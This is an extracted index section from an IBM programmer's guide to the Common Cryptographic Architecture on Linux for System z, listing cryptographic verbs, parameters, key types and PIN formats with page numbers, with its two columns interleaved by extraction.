+EPINGENA 102,157,170 +ENCIPHERkeytype 27 +EPINGENAkeysubtype 28 +Encipherprocessingrule 217 +EPINVER 102,157,170 +enciphered_textparameter +Europaypaddingrule 241 +SecureMessagingforKeysverb 349 +EVEN 191,193 +SecureMessagingforPINsverb 353 +evenparity 136,191,193 +encryptzerosDES-keyverification 493 +EX 121,202 +encryptedkey +EXkeyform 459 +definition 30 +EXEX 102,121,157,170 +EncryptedPINGenerate(CSNBEPG) 328 +EXEXkeyform 461 +format 328 +exit_dataparameter 14 +JNIversion 331 +exit_data_lengthparameter 14 +parameters 328 +expiration_dateparameter +requiredcommands 330 +CVVGenerateverb 323 +restrictions 330 +CVVVerifyverb 326 +EncryptedPINTranslate(CSNBPTR) 306,332 +EXPORT 102,157,170 +extractionrules 480 +exportablekey +format 332 +generating 459 +JNIversion 336 +exportablekeyform +parameters 332 +definition 20 +requiredcommands 335 +value 120 +usagenotes 336 +EXPORTER 102,117,123,133,155,170,173 +EncryptedPINVerify(CSNBPVR) 306,338 +extractionrules 479 +Index 573 + +exporterkeyencryptingkey generating_key_identifierparameter +anyDESkey 117 DiversifiedKeyGenerateverb 115 +EXPORTERkeytype 27 GermanBankingPoolPINalgorithm 481 +exporterkey-encryptingkey 26,109 GET-UDX 60,66,73 +exporter_key_identifierparameter +DataKeyExportverb 109 +H +KeyExportverb 118 +EXTERNAL 156,157,170 hardwarerequirements xvii +externalkey 150 HardwareSecurityModule(HSM) 34 +externalkeytoken 15,21,51,444 hashalgorithm 10 +DES 424 hashformatting 513 +PKA hashparameter +RSAprivate 427 DigitalSignatureGenerateverb 362 +verbs 22 DigitalSignatureVerifyverb 365 +extra_dataparameter One-WayHashverb 259 +RemoteKeyExportverb 399 hashpattern 74,76,78,81 +extra_data_lengthparameter hash_lengthparameter +RemoteKeyExportverb 399 DigitalSignatureGenerateverb 361 +extractionrules,PIN 479 DigitalSignatureVerifyverb 365 +One-WayHashverb 259 +HashedMessageAuthenticationcode(HMAC) xv +F +hashing 37 +files hashingfunctions 37 +hikmNativeInteger.html 17 hashingverb 40 +keystorage 33 HCPUACLR 86,88 +financialservicesverb 303 HCPUAPRT 86,88 +FIPS-RNT 97 HEX-8 242,246 +FIRST 136,137,139,236,239,242,246,250,259 HEX-9 242,247 +flashEPROMmemory HEXDIGIT 319 +size 63 HEXDIGITPINextractionmethodkeyword 308 +formparameter highresolutionpollingtimer 538 +RandomNumberGenerateverb 191 hikmNativeInteger +formatcontrol 309 description 17 +formats hikmNativeInteger.htmlfile 17 +PIN 37 HMAC 128,140,147,159,160,166,167,195,198, +formattinghashesandkeys 513 208,235,238 +functionaloverview,CCA 4 HMACalgorithm 23 +HMACGenerate(CSNBHMG) 235 +format 235 +G +JNIversion 237 +GBP-PIN 102,157,170,329,339 parameters 235 +GBP-PINalgorithm 339 relatedinformation 237 +GBP-PINO 102,157,170 requiredcommands 236 +GENERATE 143,145,147,150,160,356 restrictions 236 +generated_key_identifierparameter HMACkey 128,131 +DiversifiedKeyGenerateverb 115 HMACkeytoken 439 +generated_key_identifier_1parameter HMACkeytype 27 +KeyGenerateverb 125 HMACkeys +KeyGenerate2verb 131 definition 26 +generated_key_identifier_1_lengthparameter HMACverb 40 +KeyGenerate2verb 130 HMACVerify(CSNBHMV 238 +generated_key_identifier_2parameter format 238 +KeyGenerateverb 125 JNIversion 240 +KeyGenerate2verb 131 parameters 238 +generated_key_identifier_2_lengthparameter relatedinformation 240 +KeyGenerate2verb 131 requiredcommands 239 +generated_key_tokenparameter usagenotes 240 +PKAKeyGenerateverb 372 HMACVERkeytype 27 +generated_key_token_lengthparameter hostCPUacceleration 213,218,241,245 +PKAKeyGenerateverb 372 howtousethisdocument xviii +574 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +I input_block_identifier_lengthparameter +TrustedBlockCreateverb 404 +IBM +input_KEK_identifierparameter +contacting xx +KeyTranslate2verb 176 +IBM3624 315,338 +input_KEK_key_identifierparameter +IBM4764CryptoExpress2feature xvii +KeyTranslateverb 173 +IBM4765CryptoExpress3feature xvii +input_KEK_lengthparameter +IBMGBP 338 +KeyTranslate2verb 176 +IBM-PIN 102,157,170,329,339 +input_key_identifierparameter +IBM-PINalgorithm 339 +SecureMessagingforKeysverb 348 +IBM-PINO 102,157,170,319,339 +input_key_lengthparameter +IBM-PINOalgorithm 339 +KeyTranslate2verb 176 +ICVselectionprocessingrule +input_key_tokenparameter +continue 215,219,223,228 +KeyTranslateverb 173 +initial 215,219,223,228 +KeyTranslate2verb 176 +IEKYXLATkeytype 27 +input_PAN_dataparameter +IKEYXLAT 26,102,117,123,133,155,170,173 +SecureMessagingforPINsverb 352 +IM 121,202 +input_PIN_blockparameter +IMkeyform 459 +SecureMessagingforPINsverb 352 +IMEX 102,121,157,170 +input_PIN_encrypting_key_identifierparameter +IMEXkeyform 461 +EncryptedPINTranslateverb 332 +IMIM 102,121,157,170 +EncryptedPINVerifyverb 338 +IMP-PKA 117 +input_PIN_profileparameter +IMP-PKAkeytype 27 +EncryptedPINTranslateverb 332 +IMPORT 102,157,170 +EncryptedPINVerifyverb 338 +importablekey +SecureMessagingforPINsverb 352 +generating 459 +input/output(I/O)parameter 13 +importablekeyform +InterbankPIN 45,305,315,338 +definition 20 +intermediatePIN-block(IPB) 478 +value 120 +INTERNAL 156,157,160,170 +IMPORTER 102,111,117,123,133,155,170,173 +internalkeytoken 15,51 +IMPORTERkeytype 27 +AES 421 +importerkey-encryptingkey 26 +clear 423 +importer_key_identifierparameter +definition 21 +DataKeyImportverb 111 +DES 421,423 +KeyImportverb 134 +PKA +PKAKeyImportverb 375 +RSAprivate 430,431,432,436,438,439 +RemoteKeyExportverb 398 +intrusionlatch 63 +importer_key_identifier_lengthparameter +IPB(intermediatePIN-block) 478 +RemoteKeyExportverb 398 +IPINENC 102,117,123,133,155,170 +INACTIVE 404 +IPINENCkeytype 27,332 +INBKPIN 315 +IPSprocessingrule 215,219 +INBK-PIN 102,157,170,329,338,339 +ISO16609TDESMAC 503 +InformationProtectionSystem(IPS) +ISO9796 365 +Decipher 213 +ISO9796-1 360,364 +Encipher 217 +ISOformat0 307,477 +initialprocessingrule 215,219,223,228 +ISOformat1 307,478 +initialization_vectorparameter +ISOformat2 478 +CryptographicVariableEncipherverb 107 +ISOformat3 478 +Decipherverb 214 +ISOformat3 307 +Encipherverb 218 +ISO-0PINblockformat 308,477 +SecureMessagingforKeysverb 349 +ISO-1PINblockformat 308,478 +SecureMessagingforPINsverb 353 +ISO-2PINblockformat 308,478 +SymmetricAlgorithmDecipherverb 224 +ISO-3PINblockformat 308,478 +SymmetricAlgorithmEncipherverb 229 +ISO-9796 361 +initialization_vector_lengthparameter +ITER-38 371 +SymmetricAlgorithmDecipherverb 224 +ivp.e xviii +SymmetricAlgorithmEncipherverb 229 +command 553 +initializingkeystorage 90 +utility 31,553 +input_block_identifierparameter +TrustedBlockCreateverb 405 +Index 575 + +J key (continued) +separation 19 +Java +single-length 459,460 +datatypes 17 +symmetricmasterkey 25 +entrypointnames 17 +translated 10,11 +supportedversions 16 +transport 26 +JavaBytecode 17 +triplelengthDES 23 +running 17 +type 25 +Javainteraction 3 +VISAPVV 318 +JavaNativeInterface(JNI) xvi,16 +wrapping 10,23 +Bytecode 17 +KEY 156,170 +JNI xvi +keycache 8 +keycache,hostside 8 +K keyencryptingkey 120,133,173,175,189,394 +distribution 34 +KAT 97 exporter 117 +KDFinCounterMode 23 new 9 +kek_key_identifierparameter keyencryptingkeyvariant +KeyTestExtendedverb 153 definition 20 +KEK_key_identifierparameter keyexport 195 +ControlVectorTranslateverb 104 KeyExport(CSNBKEX) 117 +ProhibitExportExtendedverb 189 format 117 +KEK_key_identifier_1parameter JNIversion 118 +KeyGenerateverb 124 parameters 117 +KEK_key_identifier_2parameter requiredcommands 118 +KeyGenerateverb 124 restrictions 118 +key usagenotes 118 +AESmasterkey 25 keyform 120,124,459 +asymmetricmasterkey 25 combinationsforakeypair 126 +CIPHER 26 combinationswithkeytype 126 +clear 10,11,30 definition 20 +controlvector 19,25 exportable 20 +datakey importable 20 +export 109 operational 20 +importing 100 value 120 +re-enciphering 109 keyformbits 468 +data-encrypting 25 keyformats 421 +DECIPHER 26 keyformatting 513 +doublelength 22 keyfunctions 11 +double-length 460,461 KeyGenerate(CSNBKGN) 120 +ENCIPHER 26 format 120 +encrypted 30,128 JNIversion 127 +exporterkey-encrypting 26 parameters 120 +form 20 requiredcommands 125 +generating usagenotes 126 +encrypted 120 using 459 +HMAC 26 KeyGenerate2(CSNBKGN2) 128 +importerkey-encrypting 26 format 128 +key-encrypting 26 JNIversion 132 +MAC 26 parameters 128 +master 10 requiredcommands 131 +multipledecipherment/encipherment 504 restrictions 131 +NOCVImportersandExporters 26 usagenotes 131 +pair 460,461 keygeneratingkey 113 +parity 100 definition 27 +PIN 26 keyidentifier 11,15 +PIN-encryptingkey 332 definition 51 +protected 10,11 PKA 50 +protecting 211 keyidentifierparameter +re-encipher 133 ClearKeyImportverb 100 +re-enciphering 117 KeyImport(CSNBKIM) 133 +576 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +KeyImport(CSNBKIM) (continued) KeyTest2(CSNBKYT2) (continued) +format 133 JNIversion 148 +JNIversion 135 parameters 147 +parameters 133 requiredcommands 148 +requiredcommands 134 restrictions 148 +restrictions 134 usagenotes 148 +usagenotes 134 keytoken 11,15,23,109,111,113,115,117,123, +keylabel 7,15,51,107,117,261,262 133,155,159,169,175,179,189,195,198,208, +keylength 74 238,267,403,444 +keymanagement 3,34 AES 421 +PKA 49 definition 21 +keypair 126 DES +keypairgeneration 504 external 421,424 +keypart 93,94,150 internal 421 +KeyPartImport(CSNBKPI) 136 null 421,425 +format 136 DESinternal 423 +JNIversion 138 ECC 436,438,439 +parameters 136 EllipticCurveCryptography(ECC) 47,48,49,51, +requiredcommands 138 90,263,360,361,364,370,371,374,377,378 +restrictions 138 external 15,21 +KeyPartImport2(CSNBKPI2) 139 HMAC 439 +format 139 internal 15,21,51 +JNIversion 141 null 22 +parameters 139 operational 15 +requiredcommands 141 PKA 48 +restrictions 141 null 439 +usagenotes 141 RSA1024-bitmodulus-exponentprivate +keypartregister 73 external 428 +keypartregisterhash 74 RSA1024-bitprivateinternal 431,432,436, +keyrecord 33,90 438,439 +caching 8 RSA2048-bitChineseRemainderTheorem +keyrule 144 privateexternal 428 +keystorage 7,8,93,117,136,173,261,265,549, RSA2048-bitChineseRemainderTheorem +551 privateinternal 433 +environmentvariables 262 RSAprivate 426,427,428 +LinuxonIBMSystemz 263 RSAprivateexternal 427 +keystoragefile 33,266,553 RSAprivateinternal 430 +KeyStorageInitialization(CSNBKSI) 90 RSApublic 426 +format 90 variableModulus-Exponent 435 +JNIversion 91 PKAexternal 52 +parameters 90 verbs 21 +requiredcommands 91 KeyTokenBuild(CSNBKTB) 29,155 +restrictions 91 format 155 +keysubtype JNIversion 157 +list 28 parameters 155 +specifiedbyrule_array 28 usagenotes 157 +KeyTest(CSNBKYT) 143 KeyTokenBuild2(CSNBKTB2) 159 +format 144 format 159 +JNIversion 146 JNIversion 162 +parameters 144 parameters 159 +requiredcommands 145 restrictions 161 +usagenotes 146 KeyTokenChange(CSNBKTC) 163 +KeyTestExtended(CSNBKYTX) 150 format 163 +format 151 JNIversion 165 +JNIversion 153 parameters 163 +parameters 151 requiredcommands 164 +requiredcommands 153 KeyTokenChange2(CSNBKTC2) 166 +restrictions 153 format 166 +usagenotes 153 JNIversion 167 +KeyTest2(CSNBKYT2) 147 parameters 166 +format 147 requiredcommands 167 +Index 577 + +KeyTokenChange2(CSNBKTC2) (continued) key_identifierparameter +restrictions 167 ClearKeyImportverb 100 +KeyTokenParse(CSNBKTP) 169 Decipherverb 214 +format 169 DiversifiedKeyGenerateverb 115 +JNIversion 172 Encipherverb 218 +parameters 169 HMACGenerateverb 236 +usagenotes 171 HMACVerifyverb 239 +KeyTranslate(CSNBKTR) 173 KeyPartImportverb 137 +format 173 KeyTestExtendedverb 152 +JNIversion 174 KeyTestverb 145 +parameters 173 KeyTest2verb 148 +requiredcommands 173 KeyTokenChangeverb 164 +restrictions 173 KeyTokenChange2verb 167 +KeyTranslate2(CSNBKTR2) 175 MACGenerateverb 241 +format 175 MACVerifyverb 245 +JNIversion 177 MultipleClearKeyImportverb 180 +parameters 175 PKAKeyTokenChangeverb 386 +requiredcommands 177 ProhibitExportverb 188 +restrictions 177 RestrictKeyAttributeverb 196 +keytranslationcache 10 SymmetricAlgorithmDecipherverb 223 +keytype 15,19,102,124,133,155,459 SymmetricAlgorithmEncipherverb 228 +list 27 key_identifier_lengthparameter +keytype1 460,461 HMACGenerateverb 236 +keytype2 460,461 HMACVerifyverb 239 +keyverificationpattern 93,143,147 KeyTest2verb 148 +keywrapping 128,175 KeyTokenChange2verb 167 +AES 22 MultipleClearKeyImportverb 180 +definition 22 PKAKeyTokenChangeverb 386 +DES 22 RestrictKeyAttributeverb 195 +electroniccodebook 22 SymmetricAlgorithmDecipherverb 223 +enhancedCBC 23 SymmetricAlgorithmEncipherverb 228 +key_check_parametersparameter key_labelparameter +RemoteKeyExportverb 400 AESKeyRecordCreateverb 267 +key_check_parameters_lengthparameter AESKeyRecordDeleteverb 269 +RemoteKeyExportverb 400 AESKeyRecordListverb 271 +key_check_valueparameter AESKeyRecordReadverb 274 +RemoteKeyExportverb 400 AESKeyRecordWriteverb 276 +key_check_value_lengthparameter DESKeyRecordCreateverb 278 +RemoteKeyExportverb 400 DESKeyRecordDeleteverb 280 +key_encrypting_key_identifierparameter DESKeyRecordListverb 282 +KeyTest2verb 148 DESKeyRecordReadverb 284 +RestrictKeyAttributeverb 196 DESKeyRecordWriteverb 286 +SecureMessagingforKeysverb 348 PKAKeyRecordListverb 293 +SymmetricKeyGenerateverb 202 RetainedKeyDeleteverb 299 +key_encrypting_key_identifier_1parameter key_label_maskparameter +KeyGenerate2verb 130 RetainedKeyListverb 301 +key_encrypting_key_identifier_1_lengthparameter key_labelsparameter +KeyGenerate2verb 130 RetainedKeyListverb 302 +key_encrypting_key_identifier_2parameter key_labels_countparameter +KeyGenerate2verb 130 RetainedKeyListverb 302 +key_encrypting_key_identifier_2_lengthparameter key_lengthparameter +KeyGenerate2verb 130 KeyGenerateverb 121 +key_encrypting_key_identifier_lengthparameter key_nameparameter +KeyTest2verb 148 KeyTokenBuild2verb 161 +RestrictKeyAttributeverb 196 SymmetricKeyImportverb 209 +key_formparameter key_name_1parameter +KeyGenerateverb 120 KeyGenerate2verb 129 +key_generation_dataparameter key_name_1_lengthparameter +PINChange/Unblockverb 343 KeyGenerate2verb 129 +key_generation_data_lengthparameter key_name_2parameter +PINChange/Unblockverb 343 KeyGenerate2verb 130 +578 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +key_name_2_lengthparameter KEY-ENC 144,150 +KeyGenerate2verb 130 KEY-ENCD 144,150 +key_name_lengthparameter key-encryptingkey 26 +KeyTokenBuild2verb 161 description 26 +SymmetricKeyImportverb 209 exporter 109 +key_offsetparameter key-halfprocessing 474 +SecureMessagingforKeysverb 349 KEY-KM 144,150 +key_offset_field_lengthparameter KEY-MGMT 378 +SecureMessagingforKeysverb 349 KEY-NKM 144,150 +key_parmsparameter KEY-OKM 144,150 +SymmetricAlgorithmDecipherverb 223 KEY-PART 102,157,170 +SymmetricAlgorithmEncipherverb 228 key-storageinitialization 90 +key_parms_lengthparameter key-tokenverificationpatterns 492 +SymmetricAlgorithmDecipherverb 223 key-verification 491 +SymmetricAlgorithmEncipherverb 228 Keyed-HashMessageAuthenticationCode(HMAC) +key_partparameter generating 235 +KeyPartImportverb 137 verifying 238 +MasterKeyProcessverb 94 KEYGENKY 102,103,114,123,155,170 +key_storage_descriptionparameter KEYGENKYkeytype 27 +KeyStorageInitializationverb 91 KEYIDENT 223,228 +key_storage_description_lengthparameter KEYLN16 102,122,157,170,202 +KeyStorageInitializationverb 91 KEYLN24 122,202 +key_storage_file_nameparameter KEYLN32 122,202 +KeyStorageInitializationverb 91 KEYLN8 102,122,157,170,202 +key_storage_file_name_lengthparameter keyvalueparameter +KeyStorageInitializationverb 90 PKAEncryptverb 186 +key_tokenparameter keyvalue_lengthparameter +AESKeyRecordCreateverb 268 PKAEncryptverb 185 +AESKeyRecordReadverb 274 keywordcombinations 29 +AESKeyRecordWriteverb 277 KM-ONLY 378 +DESKeyRecordReadverb 284 +DESKeyRecordWriteverb 286 +L +KeyTokenBuildverb 155 +KeyTokenParseverb 169 labelparameter +PKAKeyTokenBuildverb 383 PKAKeyRecordCreateverb 288 +key_token_lengthparameter PKAKeyRecordDeleteverb 290 +AESKeyRecordCreateverb 267 PKAKeyRecordReadverb 295 +AESKeyRecordReadverb 274 PKAKeyRecordWriteverb 297 +AESKeyRecordWriteverb 277 LABEL-DL 269,280,290 +PKAKeyTokenBuildverb 383 LAST 136,137,139,236,239,242,246,250,259 +key_typeparameter legacysupport 549 +ControlVectorGenerateverb 102 Linux +KeyExportverb 117 distributionssupported xvii +KeyImportverb 133 mixedconfigurations 553 +KeyTokenBuildverb 155 LMTD-KEK 102,157,170 +KeyTokenParseverb 169 LMTD-KEKkeysubtype 28 +key_type_1parameter loadingamasterkey 93 +KeyGenerateverb 123 local_enciphered_key_identifierparameter +KeyGenerate2verb 129 SymmetricKeyGenerateverb 203 +key_type_2parameter local_enciphered_key_identifier_lengthparameter +KeyGenerateverb 124 SymmetricKeyGenerateverb 203 +KeyGenerate2verb 129 +key_valueparameter +KeyTokenBuildverb 157 M +KeyTokenParseverb 171 +MAC 26,37,102,114,117,122,123,129,133,155, +key_value_structureparameter +160,170,459 +PKAKeyTokenBuildverb 379 +lengthkeywords 242,246 +key_value_structure_lengthparameter +managing 36 +PKAKeyTokenBuildverb 378 +MACGenerate(CSNBMGN) 241 +KEY-CLR 144,160,223,228 +format 241 +KEY-CLRD 144 +JNIversion 243 +Index 579 + +MACGenerate(CSNBMGN) (continued) MasterCardcard-verificationcode(CVC) 38,303 +parameters 241 MasterCardpaddingrule 241 +relatedinformation 243 masterkey_verify_parmparameter +requiredcommands 243 KeyTokenBuildverb 157 +restrictions 243 MD5 36,258 +MACkeytype 27 MDCGenerate(CSNBMDG) 249 +MACkeys format 250 +definition 26 JNIversion 251 +macparameter parameters 250 +HMACGenerateverb 236 relatedinformation 252 +HMACVerifyverb 239 requiredcommands 251 +MACGenerateverb 243 restrictions 251 +MACVerifyverb 247 MDCkeyedhash 252 +MACVerify(CSNBMVR) 245 MDCparameter +format 245 MDCGenerateverb 251 +JNIversion 248 MDC-2 250 +methods 245 MDC-4 143,145,150,251 +parameters 245 message +relatedinformation 247 authenticating 233 +requiredcommands 247 messageauthentication +restrictions 247 definition 36 +usagenotes 247 MessageAuthenticationCode(MAC) 36 +mac_lengthparameter description 233 +HMACGenerateverb 236 generating 233,241 +HMACVerifyverb 239 verifying 233,245 +MACD 118,133 MessageAuthenticationCode(MAC)calculation +MACLEN4 242,247 method 502 +MACLEN6 242,247 micropocessorchipoperatingspeed 63 +MACLEN8 243,247 MIDDLE 136,137,139,236,239,242,246,250,259 +MACVER 26,37,102,114,117,122,123,129,133, MIN1PART 140 +155,170 MIN2PART 140 +MACVERkeytype 27 MIN3PART 140 +maskarraypreparation 472 minibootfirmwareversion 63 +mask_array_leftparameter MIXED 102,157,170 +ControlVectorTranslateverb 104 MKVPparameter +mask_array_rightparameter KeyTokenParseverb 171 +ControlVectorTranslateverb 105 modesofoperation 211 +MASTER 371 ModificationDetectionCode(MDC) 36,233,249,493 +masterkey 6,10,133,553 generate 234 +changing 265 verify 234 +possibleeffectoninternalkeytokens 21 modular-exponentiationengine 7 +encipheredkey 133 Modulus-Exponentformat 183,378,388,389,426, +establishing 6 427,431,432,435 +masterkeyloading 93 MRP 185 +masterkeymanagement 263 multi-coprocessorfunctions 31 +MasterKeyProcess(CSNBMKP) 17,93 multiple +format 93 decipherment 504 +JNIversion 96 encipherment 504 +parameters 93 MultipleClearKeyImport(CSNBCKM) 179 +QuestionableDESkeys 95 format 179 +requiredcommands 95 JNIversion 180 +restriction 16,17 parameters 179 +restrictions 94 requiredcommands 180 +masterkeyregister 93 usagenotes 180 +masterkeyvariant multiprocessing 7 +definition 19 +masterkeyverification 144 +N +master_key_verification_patternparameter +KeyTokenParseverb 171 new_reference_PIN_blockparameter +master-keyloading 90 PINChange/Unblockverb 344 +master-keyverification 491 +580 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +new_reference_PIN_key_identifierparameter operationalkey (continued) +PINChange/Unblockverb 344 generating 459 +new_reference_PIN_key_lengthparameter operationalkeyform +PINChange/Unblockverb 344 definition 20 +new_reference_PIN_PAN_dataparameter value 120 +PINChange/Unblockverb 344 operationalkeytoken 15 +new_reference_PIN_profileparameter operationalprivatekey 47 +PINChange/Unblockverb 344 OPEX 102,121,157,170 +NISTFIPSPUB140-1 97 OPEXkeyform 460 +NISTstandardSP800-108 23,24 OPIM 102,121,157,170 +NMK 263 OPIMkeyform 460 +NMKstatus 61 OPINENC 102,117,123,133,155,170 +nokey 10 OPINENCkeytype 27,332 +NO-CV 156,170 OPK,objectprotectionkey 455 +no-exportbit 117 OPOP 121,128 +NO-KEY 156,160,170 OPOPkeyform 460 +NO-SPEC 102,157,170 opt_parameter1parameter +NO-XLATE 378 RestrictKeyAttributeverb 196 +NO-XPORT 102,157,170 opt_parameter1_lengthparameter +NOADJUST 105,145,151 RestrictKeyAttributeverb 196 +NOCV 20,118,134 opt_parameter2parameter +NOCVImportersandExporters 26 RestrictKeyAttributeverb 196 +NOEX-SYM 160,195 opt_parameter2_lengthparameter +NOEXAASY 160,195 RestrictKeyAttributeverb 196 +NOEXPORT 195 optional_dataparameter +NOEXUASY 160,195 SymmetricAlgorithmDecipherverb 225 +non-repudiation 3 SymmetricAlgorithmEncipherverb 230 +NOOFFSET 102,157,170 optional_data_lengthparameter +NOT-KEK 102,157,170 SymmetricAlgorithmDecipherverb 225 +NOT-KEKkeysubtype 28 SymmetricAlgorithmEncipherverb 230 +Notices 561 otherdocumentation xix +nullkeytoken 51,115,133 outbound_PIN_encrypting_key_identifierparameter +definition 22 EncryptedPINGenerateverb 328 +format 425,439 outputchainingvalue(OCV) 496 +numberofactivecoprocessors 62 outputchainingvector(OCV) +description 212 +output_chaining_vectorparameter +O +SecureMessagingforKeysverb 349 +OAEP 513 SecureMessagingforPINsverb 353 +objectprotectionkey(OPK) 455 output_KEK_identifierparameter +OCV(outputchainingvalue) 496 KeyTranslate2verb 176 +ODD 191,193 output_KEK_key_identifierparameter +oddparity 120,136,151,191,193 KeyTranslateverb 173 +OKEYXLAT 26,102,117,123,133,155,170,173 output_KEK_lengthparameter +OKEYXLATkeytype 27 KeyTranslate2verb 176 +OMK 264 output_key_lengthparameter +OMKstatus 61 KeyTranslate2verb 176 +One-WayHash(CSNBOWH) 258 output_key_tokenparameter +format 258 KeyTranslateverb 173 +JNIversion 260 KeyTranslate2verb 177 +parameters 258 output_PAN_dataparameter +usagenotes 260 SecureMessagingforPINsverb 352 +ONLY 236,239,242,246,250,259 output_PIN_dataparameter +OP 121,128,202 PINChange/Unblockverb 345 +OPkeyform 459 output_PIN_data_lengthparameter +operatingspeed PINChange/Unblockverb 345 +micropocessorchip 63 output_PIN_encrypting_key_identifierparameter +operatingsystemfirmwarename 62 EncryptedPINTranslateverb 332 +operatingsystemfirmwareversion 63 output_PIN_messageparameter +operationalkey 128,179,188,394 PINChange/Unblockverb 345 +distribution 34 +Index 581 + +output_PIN_message_lengthparameter personalidentificationnumber(PIN) +PINChange/Unblockverb 345 3624PINgenerationalgorithm 481 +output_PIN_profileparameter 3624PINverificationalgorithm 483 +EncryptedPINTranslateverb 334 algorithmvalue 319,339 +PINChange/Unblockverb 345 algorithms 37,305,315 +SecureMessagingforPINsverb 352 blockformat 305,332 +overlappedprocessingrestrictions 7 ClearPINGenerateAlternateverb 318 +OVERLAY 276,297 ClearPINGenerateverb 315 +definition 37 +description 303 +P +detailedalgorithms 480 +paddigit 310 encrypting 305 +format 310 encryptingkey 306,332 +pad_characterparameter extractionrules 479 +Encipherverb 219 formats 37 +PADDIGIT 319 GBPPINverificationalgorithm 485 +PADDIGITPINextractionmethodkeyword 308 generating 304,305,315 +paddingmethod 217 fromencryptedPINblock 305 +PADEXIST 319 GermanBankingPoolPINalgorithm 481 +PADEXISTPINextractionmethodkeyword 308 InterbankPINgenerationalgorithm 489 +PADMDC-2 251 keys 26 +PADMDC-4 251 managing 37 +pairofkeys 460,461 PINoffsetgenerationalgorithm 482 +PAN_dataparameter PVVgenerationalgorithm 488 +ClearPINEncryptverb 313 PVVverificationalgorithm 489 +ClearPINGenerateAlternateverb 318 translating 305 +CVVGenerateverb 323 translationof,innetworks 304 +CVVVerifyverb 326 translationverb 332 +EncryptedPINGenerateverb 330 using 303 +EncryptedPINVerifyverb 339 verificationverb 338 +PAN_data_inparameter verifying 305,338 +EncryptedPINTranslateverb 333 VISAPINalgorithm 487 +PAN_data_outparameter PIN 102,157,170 +EncryptedPINTranslateverb 334 PINblock 305 +PAN-13 322,325 PINblockformat +PAN-14 322,325 3621 479 +PAN-15 322,325 3624 479 +PAN-16 322,325 additionalnames 336 +PAN-17 322,325 ANSIX9.8 477 +PAN-18 322,325 detail 477 +PAN-19 322,325 ECI-2 479 +panel.exe xviii,11 ECI-3 479 +authorization 554 ISO-1 478 +functions 553 ISO-2 478 +functionsnotsupported 555 PINextractionmethodkeywords 308 +utility 25,31,32,58,266,542,544,546,547,553, values 308 +554,555,556 VISA-2 479 +parityofkey 100 VISA-3 479 +EVEN PINChange/Unblock(CSNBPCU) 342 +formparameter 191 format 342 +ODD JNIversion 346 +formparameter 191 parameters 342 +partnumber requiredcommands 345 +coprocessor 63 usagenotes 346 +PATH 16 PINkeysubtype 28 +pendingchangestoredinadapter 66 PINkeys 26 +pendingchangeuserID 66 PINnotation 477 +personalaccountnumber(PAN) 38 PINprofile 307 +forEncryptedPINTranslate 333 description 332,338 +forEncryptedPINVerify 339 PINvalidationvalue(PVV) 305,315 +PINverb 304 +582 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +PIN_block_inparameter PKAinternalkeytoken 51 +EncryptedPINTranslateverb 333 PKAkey 182,185 +PIN_block_outparameter PKAkeyalgorithm 47 +EncryptedPINTranslateverb 335 PKAKeyGenerate(CSNDPKG) 370 +PIN_check_lengthparameter format 370 +ClearPINGenerateAlternateverb 319 JNIversion 373 +ClearPINGenerateverb 316 parameters 371 +EncryptedPINVerifyverb 340 requiredcommands 372 +PIN_encrypting_key_identifierparameter restrictions 372 +ClearPINEncryptverb 312 PKAkeyidentifier 50 +SecureMessagingforPINsverb 352 PKAKeyImport(CSNDPKI) 374 +PIN_encryption_key_identifierparameter format 374 +ClearPINGenerateAlternateverb 318 JNIversion 376 +PIN_generating_key_identifierparameter parameters 374 +ClearPINGenerateverb 315 requiredcommands 375 +EncryptedPINGenerateverb 328 restrictions 375 +PIN_generation_key_identifierparameter usagenotes 375 +ClearPINGenerateAlternateverb 318 PKAkeylabel 50 +PIN_lengthparameter PKAkeymanagement 49 +ClearPINGenerateverb 316 PKAkeymanagementverb 48 +EncryptedPINGenerateverb 329 PKAKeyRecordCreate(CSNDKRC) 288 +PIN_offsetparameter format 288 +SecureMessagingforPINsverb 353 JNIversion 289 +PIN_offset_field_lengthparameter parameters 288 +SecureMessagingforPINsverb 353 relatedinformation 289 +PIN_profileparameter requiredcommands 288 +ClearPINEncryptverb 313 PKAKeyRecordDelete(CSNDKRD) 290 +ClearPINGenerateAlternateverb 318 format 290 +EncryptedPINGenerateverb 330 JNIversion 291 +PIN_verifying_key_identifierparameter parameters 290 +EncryptedPINVerifyverb 338 relatedinformation 291 +PIN-encryptingkey 332 requiredcommands 290 +PINBLOCK 319 PKAKeyRecordList(CSNDKRL) 292 +PINBLOCKPINextractionmethodkeyword 308 format 292 +PINGEN 102,117,123,133,155,170,459 JNIversion 293 +PINGENkey 459 parameters 292 +PINGENkeytype 27 relatedinformation 293 +PINLENnn 319 requiredcommands 293 +PINLEN04PINextractionmethodkeyword 308 PKAKeyRecordRead(CSNDKRR) 295 +PINLEN12PINextractionmethodkeyword 308 format 295 +PINVER 102,117,123,133,155,170 JNIversion 296 +PINVERkey 459 parameters 295 +PINVERkeytype 27 relatedinformation 296 +PKACMK 67,68,69,70,72 requiredcommands 295 +PKAcryptographickey 369 PKAKeyRecordWrite(CSNDKRW) 297 +PKAcryptography 47 format 297 +PKADecrypt(CSNDPKD) 182 JNIversion 298 +format 182 parameters 297 +JNIversion 184 relatedinformation 298 +parameters 182 requiredcommands 298 +requiredcommands 183 PKAkeystorage 90,261 +restrictions 183 PKAkeystoragefile 33 +usagenotes 183 PKAkeytoken 48,50 +PKAEncrypt(CSNDPKE) 185 external 52 +format 185 recordformat +JNIversion 187 RSA1024-bitmodulus-exponentprivate +parameters 185 external 428 +requiredcommands 186 RSA1024-bitprivateinternal 431,432,436, +restrictions 186 438,439 +usagenotes 186 RSA2048-bitChineseRemainderTheorem +PKAexternalkeytoken 51,52 privateexternal 428 +Index 583 + +PKAkeytoken (continued) PKCS1.1 360,361,364,365 +recordformat (continued) PKCS-1.2 182,185,199,202,205 +RSA2048-bitChineseRemainderTheorem PKCS-PAD +privateinternal 433 SymmetricAlgorithmDecipher 221 +RSAprivate 426,427,428 SymmetricAlgorithmEncipher 226 +RSAprivateexternal 427 PKCS-PADprocessingrule 223,228 +RSAprivateinternal 430 